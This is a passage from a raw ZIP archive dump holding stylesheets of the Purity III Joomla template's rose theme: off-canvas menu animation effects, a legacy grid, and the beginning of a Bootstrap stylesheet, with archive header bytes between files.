  -webkit-transform: translate3d(250px, 0, 0) rotateY(-15deg);
  transform: translate3d(250px, 0, 0) rotateY(-15deg);
}
.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-6.off-canvas-open .off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-6.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0) rotateY(15deg);
  transform: translate3d(-250px, 0, 0) rotateY(15deg);
}
.off-canvas-right.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-7 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-7 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  transform: translate3d(-100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-7.off-canvas-open .off-canvas-effect-7.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-7.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(90deg);
  transform: translate3d(100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-7.off-canvas-open .off-canvas-right.off-canvas-effect-7.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-8 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-8 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-8.off-canvas-open .off-canvas-effect-8.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
.off-canvas-effect-8.t3-off-canvas::after {
  display: none;
}
body.off-canvas-effect-8.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-8.off-canvas-open .off-canvas-right.off-canvas-effect-8.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-9 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-9 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-9.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-9.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-9.off-canvas-open .off-canvas-effect-9.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-9.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-9.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-10 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-10.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, 0, -250px);
  transform: translate3d(0, 0, -250px);
}
.off-canvas-effect-10.off-canvas-open .off-canvas-effect-10.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
body.off-canvas-effect-10.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-10.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-11 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-11 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(100px, 0, -600px) rotateY(-20deg);
  transform: translate3d(100px, 0, -600px) rotateY(-20deg);
}
.off-canvas-effect-11.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-11.off-canvas-open .off-canvas-effect-11.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-11.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-11.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-100px, 0, -600px) rotateY(20deg);
  transform: translate3d(-100px, 0, -600px) rotateY(20deg);
}
.off-canvas-right.off-canvas-effect-11.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-12 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-12 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(-10deg);
  transform: rotateY(-10deg);
}
.off-canvas-effect-12.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-12.off-canvas-open .off-canvas-effect-12.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-12.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-12 .t3-wrapper {
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(10deg);
  transform: rotateY(10deg);
}
.off-canvas-right.off-canvas-effect-12.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-13 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-13.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, -100%, 0);
  transform: translate3d(0, -100%, 0);
}
.off-canvas-effect-13.off-canvas-open .off-canvas-effect-13.t3-off-canvas {
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-transition-speed: 0.2s;
  transition-speed: 0.2s;
}
body.off-canvas-effect-13.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-14 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-14 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .off-canvas-effect-14.t3-off-canvas {
  -webkit-transition-delay: 0.1s;
  transition-delay: 0.1s;
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-14.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
.old-ie .t3-off-canvas {
  z-index: 100 !important;
  left: -250px;
}
html[dir="ltr"] .off-canvas-right.old-ie .t3-off-canvas {
  right: -250px;
  left: auto;
}
.modal-open .t3-wrapper {
  position: static;
}
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  background: transparent;
  color: #ffdbf8;
  padding: 0;
  width: 55px;
  height: 55px;
  line-height: 55px;
  position: absolute;
  top: 0;
  left: 0;
}
.off-canvas-toggle:hover,
.off-canvas-toggle:active,
.off-canvas-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
  background: #c2009b;
  color: #ffffff;
}
@media screen and (max-width: 1024px) {
  .no-responsive #t3-mainnav .container {
    padding-left: 53px;
  }
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 0 0 0 12px;
  height: 55px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
  line-height: 55px;
  font-size: 14px;
  font-weight: bold;
  text-transform: uppercase;
}
.t3-off-canvas .close {
  margin: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  background: transparent;
  position: absolute;
  top: 0;
  right: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 24px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #db00af;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #8f0072;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .t3-module {
  margin-bottom: 20px;
}
.t3-off-canvas .t3-off-canvas-body .module-title {
  margin-bottom: 10px;
}PKԜ�\a\��	�	0purity_iii/local/css/themes/rose/legacy-grid.cssnu&1i�.row-fluid {
  margin-left: -15px;
  margin-right: -15px;
}
[class*="span"] {
  float: left;
}
.span1, .span2, .span3, .span4, .span5, .span6, .span7, .span8, .span9, .span10, .span11, .span12 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
.span12 {
  width: 100%;
}
.span11 {
  width: 91.66666667%;
}
.span10 {
  width: 83.33333333%;
}
.span9 {
  width: 75%;
}
.span8 {
  width: 66.66666667%;
}
.span7 {
  width: 58.33333333%;
}
.span6 {
  width: 50%;
}
.span5 {
  width: 41.66666667%;
}
.span4 {
  width: 33.33333333%;
}
.span3 {
  width: 25%;
}
.span2 {
  width: 16.66666667%;
}
.span1 {
  width: 8.33333333%;
}
.offset12 {
  margin-left: 100%;
}
.offset11 {
  margin-left: 91.66666667%;
}
.offset10 {
  margin-left: 83.33333333%;
}
.offset9 {
  margin-left: 75%;
}
.offset8 {
  margin-left: 66.66666667%;
}
.offset7 {
  margin-left: 58.33333333%;
}
.offset6 {
  margin-left: 50%;
}
.offset5 {
  margin-left: 41.66666667%;
}
.offset4 {
  margin-left: 33.33333333%;
}
.offset3 {
  margin-left: 25%;
}
.offset2 {
  margin-left: 16.66666667%;
}
.offset1 {
  margin-left: 8.33333333%;
}
.offset0 {
  margin-left: 0%;
}
.visible-phone {
  display: none !important;
}
.visible-tablet {
  display: none !important;
}
.hidden-desktop {
  display: none !important;
}
.visible-desktop {
  display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-tablet {
    display: inherit !important;
  }
  .hidden-tablet {
    display: none !important;
  }
}
@media (max-width: 767px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-phone {
    display: inherit !important;
  }
  .hidden-phone {
    display: none !important;
  }
}
.width-10 {
  width: 10px;
}
.width-20 {
  width: 20px;
}
.width-30 {
  width: 30px;
}
.width-40 {
  width: 40px;
}
.width-50 {
  width: 50px;
}
.width-60 {
  width: 60px;
}
.width-70 {
  width: 70px;
}
.width-80 {
  width: 80px;
}
.width-90 {
  width: 90px;
}
.width-100 {
  width: 100px;
}
.height-10 {
  height: 10px;
}
.height-20 {
  height: 20px;
}
.height-30 {
  height: 30px;
}
.height-40 {
  height: 40px;
}
.height-50 {
  height: 50px;
}
.height-60 {
  height: 60px;
}
.height-70 {
  height: 70px;
}
.height-80 {
  height: 80px;
}
.height-90 {
  height: 90px;
}
.height-100 {
  height: 100px;
}PKԜ�\I]�.�[�[.purity_iii/local/css/themes/rose/bootstrap.cssnu&1i�html {
  font-family: sans-serif;
  -ms-text-size-adjust: 100%;
  -webkit-text-size-adjust: 100%;
}
body {
  margin: 0;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
menu,
nav,
section,
summary {
  display: block;
}
audio,
canvas,
progress,
video {
  display: inline-block;
  vertical-align: baseline;
}
audio:not([controls]) {
  display: none;
  height: 0;
}
[hidden],
template {
  display: none;
}
a {
  background-color: transparent;
}
a:active,
a:hover {
  outline: 0;
}
abbr[title] {
  border-bottom: 1px dotted;
}
b,
strong {
  font-weight: bold;
}
dfn {
  font-style: italic;
}
h1 {
  font-size: 2em;
  margin: 0.67em 0;
}
mark {
  background: #ff0;
  color: #000;
}
small {
  font-size: 80%;
}
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}
img {
  border: 0;
}
svg:not(:root) {
  overflow: hidden;
}
figure {
  margin: 1em 40px;
}
hr {
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 0;
}
pre {
  overflow: auto;
}
code,
kbd,
pre,
samp {
  font-family: monospace, monospace;
  font-size: 1em;
}
button,
input,
optgroup,
select,
textarea {
  color: inherit;
  font: inherit;
  margin: 0;
}
button {
  overflow: visible;
}
button,
select {
  text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}
button[disabled],
html input[disabled] {
  cursor: default;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}
input {
  line-height: normal;
}
input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: textfield;
  -moz-box-sizing: content-box;
  -webkit-box-sizing: content-box;
  box-sizing: content-box;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}
fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}
legend {
  border: 0;
  padding: 0;
}
textarea {
  overflow: auto;
}
optgroup {
  font-weight: bold;
}
table {
  border-collapse: collapse;
  border-spacing: 0;
}
td,
th {
  padding: 0;
}

@media print {
  *,
  *:before,
  *:after {
    background: transparent !important;
    color: #000 !important;
    box-shadow: none !important;
    text-shadow: none !important;
  }
  a,
  a:visited {
    text-decoration: underline;
  }
  a[href]:after {
    content: " (" attr(href) ")";
  }
  abbr[title]:after {
    content: " (" attr(title) ")";
  }
  a[href^="#"]:after,
  a[href^="javascript:"]:after {
    content: "";
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  img {
    max-width: 100% !important;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  select {
    background: #fff !important;
  }
  .navbar {
    display: none;
  }
  .btn > .caret,
  .dropup > .btn > .caret {
    border-top-color: #000 !important;
  }
  .label {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}

* {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
html {
  font-size: 10px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  line-height: 1.42857143;
  color: #444444;
  background-color: #ffffff;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #db00af;
  text-decoration: none;
}
a:hover,
a:focus {
  color: #8f0072;
  text-decoration: underline;
}
a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
figure {
  margin: 0;
}
img {
  vertical-align: middle;
}
.img-responsive,
.thumbnail > img,
.thumbnail a > img,
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  display: block;
  max-width: 100%;
  height: auto;
}
.img-rounded {
  border-radius: 0px;
}
.img-thumbnail {
  padding: 4px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
  -webkit-transition: all 0.2s ease-in-out;
  -o-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  display: inline-block;
  max-width: 100%;
  height: auto;
}
.img-circle {
  border-radius: 50%;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  margin: -1px;
  padding: 0;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
.sr-only-focusable:active,
.sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  clip: auto;
}
[role="button"] {
  cursor: pointer;
}

code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
code {
  padding: 2px 4px;
  font-size: 90%;
  color: #c7254e;
  background-color: #f9f2f4;
  border-radius: 0px;
}
kbd {
  padding: 2px 4px;
  font-size: 90%;
  color: #ffffff;
  background-color: #333333;
  border-radius: 0px;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.25);
}
kbd kbd {
  padding: 0;
  font-size: 100%;
  font-weight: bold;
  box-shadow: none;
}
pre {
  display: block;
  padding: 9.5px;
  margin: 0 0 10px;
  font-size: 13px;
  line-height: 1.42857143;
  word-break: break-all;
  word-wrap: break-word;
  color: #444444;
  background-color: #f5f5f5;
  border: 1px solid #cccccc;
  border-radius: 0px;
}
pre code {
  padding: 0;
  font-size: inherit;
  color: inherit;
  white-space: pre-wrap;
  background-color: transparent;
  border-radius: 0;
}
.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}
.container {
  margin-right: auto;
  margin-left: auto;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 768px) {
  .container {
    width: 750px;
  }
}
@media (min-width: 992px) {
  .container {
    width: 970px;
  }
}
@media (min-width: 1200px) {
  .container {
    width: 1170px;
  }
}
.container-fluid {
  margin-right: auto;
  margin-left: auto;
  padding-left: 15px;
  padding-right: 15px;
}
.row {
  margin-left: -15px;
  margin-right: -15px;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
  float: left;
}
.col-xs-12 {
  width: 100%;
}
.col-xs-11 {
  width: 91.66666667%;
}
.col-xs-10 {
  width: 83.33333333%;
}
.col-xs-9 {
  width: 75%;
}
.col-xs-8 {
  width: 66.66666667%;
}
.col-xs-7 {
  width: 58.33333333%;
}
.col-xs-6 {
  width: 50%;
}
.col-xs-5 {
  width: 41.66666667%;
}
.col-xs-4 {
  width: 33.33333333%;
}
.col-xs-3 {
  width: 25%;
}
.col-xs-2 {
  width: 16.66666667%;
}
.col-xs-1 {
  width: 8.33333333%;
}
.col-xs-pull-12 {
  right: 100%;
}
.col-xs-pull-11 {
  right: 91.66666667%;
}
.col-xs-pull-10 {
  right: 83.33333333%;
}
.col-xs-pull-9 {
  right: 75%;
}
.col-xs-pull-8 {
  right: 66.66666667%;
}
.col-xs-pull-7 {
  right: 58.33333333%;
}
.col-xs-pull-6 {
  right: 50%;
}
.col-xs-pull-5 {
  right: 41.66666667%;
}
.col-xs-pull-4 {
  right: 33.33333333%;
}
.col-xs-pull-3 {
  right: 25%;
}
.col-xs-pull-2 {
  right: 16.66666667%;
}
.col-xs-pull-1 {
  right: 8.33333333%;
}
.col-xs-pull-0 {
  right: auto;
}
.col-xs-push-12 {
  left: 100%;
}
.col-xs-push-11 {
  left: 91.66666667%;
}
.col-xs-push-10 {
  left: 83.33333333%;
}
.col-xs-push-9 {
  left: 75%;
}
.col-xs-push-8 {
  left: 66.66666667%;
}
.col-xs-push-7 {
  left: 58.33333333%;
}
.col-xs-push-6 {
  left: 50%;
}
.col-xs-push-5 {
  left: 41.66666667%;
}
.col-xs-push-4 {
  left: 33.33333333%;
}
.col-xs-push-3 {
  left: 25%;
}
.col-xs-push-2 {
  left: 16.66666667%;
}
.col-xs-push-1 {
  left: 8.33333333%;
}
.col-xs-push-0 {
  left: auto;
}
.col-xs-offset-12 {
  margin-left: 100%;
}
.col-xs-offset-11 {
  margin-left: 91.66666667%;
}
.col-xs-offset-10 {
  margin-left: 83.33333333%;
}
.col-xs-offset-9 {
  margin-left: 75%;
}
.col-xs-offset-8 {
  margin-left: 66.66666667%;
}
.col-xs-offset-7 {
  margin-left: 58.33333333%;
}
.col-xs-offset-6 {
  margin-left: 50%;
}
.col-xs-offset-5 {
  margin-left: 41.66666667%;
}
.col-xs-offset-4 {
  margin-left: 33.33333333%;
}
.col-xs-offset-3 {
  margin-left: 25%;
}
.col-xs-offset-2 {
  margin-left: 16.66666667%;
}
.col-xs-offset-1 {
  margin-left: 8.33333333%;
}
.col-xs-offset-0 {
  margin-left: 0%;
}
@media (min-width: 768px) {
  .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
    float: left;
  }
  .col-sm-12 {
    width: 100%;
  }
  .col-sm-11 {
    width: 91.66666667%;
  }
  .col-sm-10 {
    width: 83.33333333%;
  }
  .col-sm-9 {
    width: 75%;
  }
  .col-sm-8 {
    width: 66.66666667%;
  }
  .col-sm-7 {
    width: 58.33333333%;
  }
  .col-sm-6 {
    width: 50%;
  }
  .col-sm-5 {
    width: 41.66666667%;
  }
  .col-sm-4 {
    width: 33.33333333%;
  }
  .col-sm-3 {
    width: 25%;
  }
  .col-sm-2 {
    width: 16.66666667%;
  }
  .col-sm-1 {
    width: 8.33333333%;
  }
  .col-sm-pull-12 {
    right: 100%;
  }
  .col-sm-pull-11 {
    right: 91.66666667%;
  }
  .col-sm-pull-10 {
    right: 83.33333333%;
  }
  .col-sm-pull-9 {
    right: 75%;
  }
  .col-sm-pull-8 {
    right: 66.66666667%;
  }
  .col-sm-pull-7 {
    right: 58.33333333%;
  }
  .col-sm-pull-6 {
    right: 50%;
  }
  .col-sm-pull-5 {
    right: 41.66666667%;
  }
  .col-sm-pull-4 {
    right: 33.33333333%;
  }
  .col-sm-pull-3 {
    right: 25%;
  }
  .col-sm-pull-2 {
    right: 16.66666667%;
  }
  .col-sm-pull-1 {
    right: 8.33333333%;
  }
  .col-sm-pull-0 {
    right: auto;
  }
  .col-sm-push-12 {
    left: 100%;
  }
  .col-sm-push-11 {
    left: 91.66666667%;
  }
  .col-sm-push-10 {
    left: 83.33333333%;
  }
  .col-sm-push-9 {
    left: 75%;
  }
  .col-sm-push-8 {
    left: 66.66666667%;
  }
  .col-sm-push-7 {
    left: 58.33333333%;
  }
  .col-sm-push-6 {
    left: 50%;
  }
  .col-sm-push-5 {
    left: 41.66666667%;
  }
  .col-sm-push-4 {
    left: 33.33333333%;
  }
  .col-sm-push-3 {
    left: 25%;
  }
  .col-sm-push-2 {
    left: 16.66666667%;
  }
  .col-sm-push-1 {
    left: 8.33333333%;
  }
  .col-sm-push-0 {
    left: auto;
  }
  .col-sm-offset-12 {
    margin-left: 100%;
  }
  .col-sm-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-sm-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-sm-offset-9 {
    margin-left: 75%;
  }
  .col-sm-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-sm-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-sm-offset-6 {
    margin-left: 50%;
  }
  .col-sm-offset-5 {
    margin-left: 41.66666667%;
